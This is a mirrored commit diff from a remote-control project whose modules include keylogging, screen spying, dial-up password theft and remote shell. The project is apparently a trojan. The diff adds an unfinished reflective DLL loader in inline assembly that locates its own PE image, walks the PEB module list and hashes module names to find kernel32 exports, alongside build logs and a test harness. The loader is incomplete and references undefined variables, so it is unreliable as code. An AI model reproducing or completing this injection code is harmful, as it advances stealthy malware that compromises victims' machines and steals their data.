mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-06-12 07:19:49 +00:00
PEB汇编
This commit is contained in:
parent
d1c3b70e8f
commit
d2afef0ac1
Binary file not shown.
@ -1,28 +1,28 @@
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\pch.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audio.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\until.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\buffer.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videocap.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\manager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\install.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\strcry.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
|
||||
|
@ -8,14 +8,17 @@ g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
g:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(50): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(224): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(229): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(252): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(421): warning C4102: “loc_46327B”: 未引用的标签
|
||||
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
|
||||
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
|
||||
正在生成代码
|
||||
1 of 375 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
|
||||
1 of 380 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
|
||||
0 functions were new in current compilation
|
||||
0 functions had inline decision re-evaluated but remain unchanged
|
||||
已完成代码的生成
|
||||
|
@ -6,7 +6,12 @@
|
||||
#include "common/install.h"
|
||||
#include <stdio.h>
|
||||
#include <shlwapi.h>
|
||||
|
||||
#pragma comment(lib,"shlwapi.lib")
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
|
||||
//using namespace std;
|
||||
|
||||
|
||||
struct Connect_Address
|
||||
@ -231,6 +236,84 @@ extern "C" __declspec(dllexport) void TestFun(char* strHost, int nPort)
|
||||
|
||||
|
||||
|
||||
FILE * pFile;
|
||||
|
||||
long lSize;
|
||||
|
||||
char * buffer;
|
||||
|
||||
size_t result;
|
||||
extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
|
||||
{
|
||||
|
||||
|
||||
// 一个不漏地读入整个文件,只能采用二进制方式打开
|
||||
|
||||
pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
|
||||
|
||||
if (pFile == NULL)
|
||||
|
||||
{
|
||||
|
||||
fputs("File error", stderr);
|
||||
|
||||
printf("open file fail");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
// 获取文件大小
|
||||
|
||||
fseek(pFile, 0, SEEK_END);
|
||||
|
||||
lSize = ftell(pFile);
|
||||
|
||||
rewind(pFile);
|
||||
|
||||
|
||||
|
||||
// 分配内存存储整个文件
|
||||
|
||||
buffer = (char*)malloc(sizeof(char)*lSize);
|
||||
|
||||
if (buffer == NULL)
|
||||
|
||||
{
|
||||
|
||||
fputs("Memory error", stderr);
|
||||
|
||||
printf("Memory alloc falil");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
// 将文件拷贝到buffer中
|
||||
|
||||
result = fread(buffer, 1, lSize, pFile);
|
||||
|
||||
if (result != lSize)
|
||||
|
||||
{
|
||||
|
||||
fputs("Reading error", stderr);
|
||||
|
||||
printf("Load file to memory falil");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
return true;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
inline DWORD GetCurrentPositionAddress()
|
||||
{
|
||||
_asm{
|
||||
@ -242,38 +325,60 @@ inline DWORD GetCurrentPositionAddress()
|
||||
}
|
||||
}
|
||||
|
||||
inline DWORD call_ror_0xD()
|
||||
{
|
||||
_asm {
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
mov eax, [ebp + 8]
|
||||
ror eax, 0x0D
|
||||
pop ebp
|
||||
retn
|
||||
}
|
||||
}
|
||||
|
||||
enum LocalEnum
|
||||
{
|
||||
Nop,
|
||||
memAddress,
|
||||
pLoadLibraryA,
|
||||
pGetProcAddress,
|
||||
pVirtualAlloc,
|
||||
pVirtualProtect,
|
||||
pNtFlushInstructionCache,
|
||||
varLocalFindPE
|
||||
memAddress = 4,
|
||||
pLoadLibraryA = 8,
|
||||
pGetProcAddress = 0xC,
|
||||
pVirtualAlloc = 0x10,
|
||||
pVirtualProtect = 0x14,
|
||||
pNtFlushInstructionCache = 0x18,
|
||||
|
||||
varLocalFindPE = 0x1c,
|
||||
varLocalFS30_A = 0x20, // var_8
|
||||
varLocalFS30_B = 0x24, // varLocalFS30_B
|
||||
var_4 = 0x28, // FullDllName
|
||||
BaseDllName = 0x2c, // FullDllName
|
||||
name_hash = 0x30,
|
||||
var_20 = 0x34
|
||||
|
||||
};
|
||||
|
||||
|
||||
|
||||
extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
{
|
||||
_asm{
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
sub esp, 0x100
|
||||
sub esp, 0x100 // 抬高堆栈创建局部变量空间
|
||||
mov eax, 4
|
||||
initLocalVar:
|
||||
initLocalVar: // 循环initLocalVar初始化局部变量空间为0
|
||||
mov [ebp + eax], 0
|
||||
inc eax
|
||||
cmp eax ,0x100
|
||||
jnz initLocalVar
|
||||
|
||||
call GetCurrentPositionAddress //获取当前位置地址
|
||||
mov [ebp + memAddress], eax //保存当前代码所在的地址 memAddress
|
||||
call GetCurrentPositionAddress // 获取当前位置地址
|
||||
mov eax, buffer
|
||||
mov [ebp + memAddress], eax // 保存当前代码所在的地址 memAddress
|
||||
|
||||
addressAdd :
|
||||
mov eax, 1
|
||||
test eax, eax //判断eax是否获取到当前地址
|
||||
test eax, eax // 判断eax是否获取到当前地址
|
||||
jz find_success
|
||||
|
||||
mov ecx, [ebp + memAddress] // 查找DOS头
|
||||
@ -285,27 +390,112 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
mov eax, [ebp + memAddress]
|
||||
mov ecx, [eax + 0x3C] // +3C 找到DOS Header e_lfanew
|
||||
mov [ebp + varLocalFindPE], ecx
|
||||
cmp [ebp + varLocalFindPE], 0x40
|
||||
cmp dword ptr[ebp + varLocalFindPE], 0x40
|
||||
jb noFindFlag // 地址address - 1
|
||||
cmp [ebp + varLocalFindPE], 0x400
|
||||
jnb noFindFlag //; 地址address - 1
|
||||
cmp dword ptr[ebp + varLocalFindPE], 0x400
|
||||
jnb noFindFlag // 地址address - 1
|
||||
|
||||
mov edx, [ebp + varLocalFindPE]
|
||||
add edx, [ebp + memAddress]
|
||||
mov [ebp + varLocalFindPE], edx
|
||||
mov eax, [ebp + varLocalFindPE]
|
||||
cmp dword ptr[eax], 0x4550 //; 判断PE Header Signature PE标志
|
||||
jnz noFindFlag //; 地址address - 1
|
||||
cmp dword ptr[eax], 0x4550 // 判断PE Header Signature PE标志
|
||||
jnz noFindFlag // 地址address - 1
|
||||
jmp find_success // 找到了singtrue 跳转
|
||||
|
||||
noFindFlag :
|
||||
noFindFlag :
|
||||
mov ecx, [ebp + memAddress]; 地址address - 1
|
||||
sub ecx, 1
|
||||
mov [ebp + memAddress], ecx
|
||||
jmp addressAdd
|
||||
|
||||
find_success:
|
||||
mov edx, fs:[0x30] // 获取PEB结构地址
|
||||
mov [ebp + varLocalFS30_A], edx
|
||||
mov eax, [ebp + varLocalFS30_A]
|
||||
mov ecx, [eax + 0x0C] // 获取Ptr32 _PEB_LDR_DATA 进程加载模块链表(Ldr)
|
||||
mov [ebp + varLocalFS30_A], ecx
|
||||
mov edx, [ebp + varLocalFS30_A]
|
||||
mov eax, [edx + 0x14] // 获取结构中InMemoryOrderModuleList 顺序模块列表
|
||||
mov [ebp + varLocalFS30_B], eax
|
||||
|
||||
loc_46327B:
|
||||
cmp [ebp + varLocalFS30_B], 0
|
||||
jz find_moudle_null
|
||||
mov ecx, [ebp + varLocalFS30_B]
|
||||
mov edx, [ecx + 0x28] // FullDllName_buff 模块名称
|
||||
mov [ebp + BaseDllName], edx
|
||||
mov eax, [ebp + varLocalFS30_B]
|
||||
mov cx, [eax + 0x24] // UNICODE_STRING FullDllName Length
|
||||
mov [ebp + var_4], cx // var_4保存FullDllName字符串长度
|
||||
mov [ebp + name_hash], 0
|
||||
|
||||
calc_hash:
|
||||
mov edx, [ebp + name_hash]
|
||||
push edx
|
||||
call call_ror_0xD
|
||||
add esp, 4
|
||||
mov [ebp + name_hash], eax // ror后的eax为返回值
|
||||
mov eax, [ebp + BaseDllName]
|
||||
movzx ecx, byte ptr[eax]
|
||||
cmp ecx, 0x61 // 判断获取到的模块字符串的指定位置,小于跳转,地址 + 1,比对下一个字母
|
||||
jl less_flage
|
||||
mov edx, [ebp + BaseDllName] // 获取名称byte
|
||||
movzx eax, byte ptr[edx] // eax = byte
|
||||
mov ecx, [ebp + name_hash] // 计算值
|
||||
lea edx, [ecx + eax - 0x20] // hash + FullDllName[index] - 0x20
|
||||
mov [ebp + name_hash], edx // 得到结果
|
||||
jmp calc_end
|
||||
|
||||
less_flage:
|
||||
add ecx, [ebp + name_hash]
|
||||
mov[ebp + name_hash], ecx
|
||||
|
||||
calc_end:
|
||||
mov edx, [ebp + BaseDllName] // 名称地址 + 1
|
||||
add edx, 1
|
||||
mov [ebp + BaseDllName], edx
|
||||
mov ax, [ebp + var_4] // 字符串名称长度 - 1
|
||||
sub ax, 1
|
||||
mov [ebp + var_4], ax
|
||||
movzx ecx, [ebp + var_4]
|
||||
test ecx, ecx // 判断长度是否为0,没有为0继续计算hash
|
||||
jnz calc_hash // 计算简单的模块名称name_hash
|
||||
|
||||
cmp [ebp + name_hash], 0x6A4ABC5B // 6A4ABC5B = Kernel32
|
||||
jnz no_Kernel32_hash // 3CFA685D = ntdll
|
||||
mov edx, [ebp + varLocalFS30_B] // 获取结构中InMemoryOrderModuleList
|
||||
mov eax, [edx + 0x10]
|
||||
mov [ebp + varLocalFS30_A], eax // +10偏移获取DllBase基址
|
||||
mov ecx, [ebp + varLocalFS30_A]
|
||||
mov edx, [ebp + varLocalFS30_A]
|
||||
add edx, [ecx + 0x3C] // 获取PE IMAGE_DOS_HRADER e_lfanew
|
||||
mov [ebp + var_20], edx
|
||||
mov eax, 8
|
||||
imul ecx, eax, 0 // imul 1, 2, 3 2 3乘积保存到1
|
||||
mov edx, [ebp + var_20]
|
||||
lea eax, [edx + ecx + 0x78] // 获取IMAGE_OPTIONAL_HEADER -> IMAGE_DATA_DIRECTORY[0] EXPORT 导出表
|
||||
mov [ebp + exp_AddressOfNames], eax
|
||||
mov ecx, [ebp + exp_AddressOfNames]
|
||||
mov edx, [ebp + varLocalFS30_A] // edx = 基地址
|
||||
add edx, [ecx] // 基地址 + 导出表地址
|
||||
mov [ebp + var_20], edx
|
||||
mov eax, [ebp + var_20]
|
||||
mov ecx, [ebp + varLocalFS30_A]
|
||||
add ecx, [eax + 0x20] // 获取 IMAGE_EXPORT_DIRECTORY +0x20 AddressOfNames
|
||||
mov [ebp + exp_AddressOfNames], ecx
|
||||
mov edx, [ebp + var_20]
|
||||
mov eax, [ebp + varLocalFS30_A]
|
||||
add eax, [edx + 0x24] // 获取 IMAGE_EXPORT_DIRECTORY +0x24 AddressOfNameOrdinals
|
||||
mov [ebp + AddressOfNameOrdinals], eax
|
||||
mov ecx, 4
|
||||
mov [ebp + var_4], cx
|
||||
|
||||
|
||||
find_success:
|
||||
|
||||
|
||||
find_moudle_null:
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
@ -1 +1 @@
|
||||
f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
|
||||
g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
|
||||
|
@ -1,6 +1,6 @@
|
||||
C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
|
||||
G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
|
||||
TestLoadDll.cpp
|
||||
正在生成代码
|
||||
All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||
已完成代码的生成
|
||||
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
|
||||
TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
|
||||
|
@ -1,2 +1,2 @@
|
||||
#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
|
||||
Release|Win32|F:\myapp\CcRemote\CcMainDll\|
|
||||
Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
|
||||
|
@ -11,6 +11,16 @@ int main()
|
||||
//载入服务端dll hijack test
|
||||
HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");
|
||||
|
||||
typedef int(_cdecl *TestRunInit)();
|
||||
|
||||
TestRunInit InitTestReflectiveLoader = (TestRunInit)GetProcAddress(hServerDll, "InitTestReflectiveLoader");
|
||||
|
||||
if (InitTestReflectiveLoader != NULL)
|
||||
{
|
||||
InitTestReflectiveLoader(); //调用这个函数
|
||||
}
|
||||
|
||||
|
||||
//声明导出函数类型--导出的TestRun函数
|
||||
typedef void(_cdecl *TestRunT)();
|
||||
//寻找dll中导出函数
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user